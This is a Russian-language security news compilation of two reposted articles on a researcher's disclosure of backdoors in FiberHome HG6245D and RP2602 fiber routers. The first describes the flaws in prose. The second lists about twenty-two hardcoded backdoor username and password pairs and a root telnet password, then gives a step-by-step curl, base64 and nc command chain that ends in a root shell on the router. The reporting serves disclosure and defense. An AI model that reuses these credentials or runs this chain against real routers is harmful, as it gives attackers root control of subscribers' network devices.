В маршрутизаторах FiberHome Networks обнаружено более 20 бэкдоров

[ve1]

ИБ-исследователь Пьер Ким опубликовал отчет, в котором рассказал, что в прошивках популярных маршрутизаторов китайской компании FiberHome Networks, широко распространенных в Южной Америке и Юго-Восточной Азии, было обнаружено 28 бэкдор-аккаунтов и ряд других уязвимостей.

Проблемы были найдены в двух моделях FTTH ONT маршрутизаторов: FiberHome HG6245D и FiberHome RP2602. FTTH ONT — это аббревиатура от Fiber-to-the-Home Optical Network Terminal. Так обозначают специальные устройства, устанавливаемые на концах оптоволоконных кабелей. Такие девайсы призваны преобразовать сигналы, передаваемые по оптоволоконным кабелям, в классические Ethernet и Wi-Fi.

Ким отмечает, что панель управления обоих устройств недоступна через внешний интерфейс IPv4, что делает невозможными атаки через интернет. Также по умолчанию отключен Telnet, которым часто злоупотребляют ботнеты. Однако исследователь пишет, что по какой-то причине инженеры FiberHome Networks не смогли реализовать те же средства защиты для интерфейса IPv6. Так, брандмауэр устройств активен только для IPv4, что позволяет злоумышленникам получить прямой доступ ко всем внутренним службам, если им известен IPv6-адрес девайса.

С этой особенности эксперт начинает длинный список бэкдоров и уязвимостей, которые он нашел в прошивках FiberHome HG6245D и FiberHome RP2602. При этом Ким пишет, что, по его мнению, некоторые бэкдоры были внедрены самим производителем и появились в коде умышленно. Исследователь описывает следующие проблемы:

• управляющий интерфейс сливает информацию об устройстве при доступе из браузера с отключенным JavaScript. В частности, утекает MAC-адрес устройства;
• бэкдор позволяет злоумышленнику использовать MAC-адрес устройства, чтобы установить Telnet-соединение с маршрутизатором, отправив специально созданный HTTPS-запрос [https://[ip]/telnet?enable=0&key=calculated(BR0_MAC)];
• пароли и аутентификационные cookie панели администратора хранятся в виде простого текста в HTTP-логах;
• интерфейс управления защищен жестко закодированным SSL-сертификатом, хранящимся на устройстве, он может быть скачан использован для MitM-атак;
• веб-сервер (панель управления) содержит 22 пары жестко закодированных учетных данных, которые, по мнению Кима, были добавлены умышленно и используются различными поставщиками интернет-сервисов;
• прошивка содержит жестко закодированные учетные данные для управления устройством через TR-069;
• в зашифрованном бинарнике веб-сервера так же есть учетные данные, а ключ XOR для их расшифровки тоже находится бинарнике, что делает шифрование бесполезным. Как отмечает Ким, это тот же ключ XOR, который используется в прошивке устройств C-Data и с ним тоже связаны похожие проблемы с бэкдором;
• был найден и жестко закодированный root-пароль для Telnet-сервера, хотя по умолчанию сервер отключен;
• кроме того, прошивка включает различные наборы жестко закодированных учетных данных для низкоуровневого аккаунта Telnet (Ким нашел четыре пары);
• уязвимость повышения привилегий в демоне Telnet позволяет злоумышленникам повысить свои привилегии до уровня root;
• аутентификацию Telnet можно обойти двумя разными способами;
• можно использовать ошибку отказа в обслуживании для полного отказа Telnet;
• пароли от разных служб маршрутизатора хранятся в открытом виде внутри прошивки или в памяти NVRAM.

Ким пишет, что обнаружил все причисленные баги еще в январе 2020 года и тогда же уведомил о них производителя, однако так и не получил от компании никакого ответа. В итоге исследователь не знает, были ли какие-то из этих уязвимостей исправлены, так как новые версии прошивок он уже не тестировал.

Эксперт предупреждает, что эти бэкдоры и уязвимости могут затрагивать и другие устройства FiberHome Networks, так как большинство производителей используют одни и те же прошивки или изменяют их совсем незначительно для разных девайсов.

Источник: xakep.ru/2021/01/18/fiberhome-networks-backdoors/

 

[INC.]

В маршрутизаторах FiberHome, применяемых провайдерами для подключения абонентов к оптическим линиям связи GPON, выявлено 17 проблем с безопасностью, среди которых наличие бэкдоров с предопределёнными учётными данными, позволяющими удалённо управлять оборудованием. Проблемы дают возможность удалённому атакующему получить root-доступ к устройству без прохождения аутентификации. Наличие уязвимостей подтверждено в устройствах FiberHome HG6245D и RP2602, а также частично в устройствах AN5506-04-*, но не исключено, что проблемы затрагивают и другие модели маршрутизаторов данной компании, которые не проверялись.

Отмечается, что по умолчанию доступ по IPv4 к интерфейсу администратора на изученных устройствах ограничен внутренним сетевым интерфейсом, допускающим обращение только из локальной сети, но при этом доступ по IPv6 никак не ограничен, что позволяет использовать присутствующие бэкдоры при обращении по IPv6 из внешней сети.

Кроме web-интерфейса, работающего через HTTP/HTTPS, на устройствах предусмотрена функция для удалённой активации интерфейса командной строки, к которому можно обращаться по протоколу telnet. CLI активируется отправкой специального запроса по протоколу HTTPS с предопределёнными учётными данными. Кроме того, в http-сервере, обслуживающем web-интерфейс, выявлена уязвимость (переполнение стека), эксплуатируемая через отправку запроса со специально оформленным значением HTTP Cookie.

Всего исследователем выявлено 17 проблем с безопасностью, из которых 7 затрагивают HTTP-сервер, 6 - сервер telnet, а остальные связаны с общесистемными брешами. Производитель был уведомлен о выявленных проблемах год назад, но информации об исправлении не поступило. Среди выявленных проблем:

• Утечка информации о подсетях, прошивке, идентификаторе соединения FTTH , IP- и MAC-адресах на стадии до прохождения аутентификации.

• Сохранение в логе паролей пользователей в открытом виде.

• Хранение открытым текстом учётных данных для подключения к беспроводным сетям и паролей.

• Переполнение стека в HTTP-сервере.

Присутствие в прошивке закрытого ключа для SSL-сертификатов, который можно загрузить по HTTPS ("curl https://host/privkeySrv.pem").

• Бэкдор для активации telnet - в коде http-сервера присутствует специальный обработчик запросов "/telnet", а также обработчик "/fh" для привилегированного доступа.

• Жёстко заданные в прошивке инженерные пароли и параметры аутентификации. Всего в коде http-сервера было выявлено 23 прошитых учётных записей, привязанных к разным провайдерам. Пароли использовались в обработчике https://ip/fh для активации telnet:
user / user1234
f~i!b@e#r$h%o^m*esuperadmin / s(f)u_h+g|u
admin / lnadmin
admin / CUadmin
admin / admin
telecomadmin / nE7jA%5m
adminpldt / z6dUABtl270qRxt7a2uGTiw
gestiontelebucaramanga / t3l3buc4r4m4ng42013
rootmet / m3tr0r00t
awnfibre / fibre@dm!n
trueadmin / admintrue
admin / G0R2U1P2ag
admin / 3UJUh2VemEfUtesEchEC2d2e
admin / c 6 по 32 символы MAC-адреса на интерфейсе br0
admin / 888888
L1vt1m4eng / 888888
useradmin / 888888
user / 888888
admin / 1234
user / tattoo@home
admin / tele1234
admin / aisadmin

• Дополнительно в CLI-интерфейсе можно запустить на 26 сетевом порту отдельный процесс telnetd с правами root, передав последовательность команд ",help,list,who,ddd,tshell" ('GgpoZWxwCmxpc3QKd2hvCg==' в base64). Для подключения к telnet определён общий пароль "GEPON".

В простейшем случае для получения root-доступа к маршрутизатору достаточно отправить несколько запросов при помощи утилиты curl:


   # Получаем информацию о MAC-адресе, через API, доступный без аутентификации:

    curl -k https://target/info.asp 

   # Используем хвост MAC-адреса в качестве ключа для снятия в пакетном фильтре блокировки доступа к CLI-интерфейсу по протоколу telnet:

    сurl -k 'https://target/telnet?enable=1&key=ENDING_PART_MAC_ADDR'  

   # Отправляем в CLI-интерфейс на 23 порт последовательность команд для запуска процесса telnetd.
                                      
   echo GgpoZWxwCmxpc3QKd2hvCmRkZAp0c2hlbGwK | base64 -d | nc target 23 >/dev/null &
                                                                                        
   # Подключаемся к сетевому порту 26 по протоколу telnet с логином root и паролем  GEPON.                                                                             

    telnet target 26
   
    (none) login: root
    Password: [GEPON]
    BusyBox v1.27.2 (2019-04-01 19:16:06 CST) built-in shell (ash)
    #id
    uid=0(root) gid=0 groups=0 # game over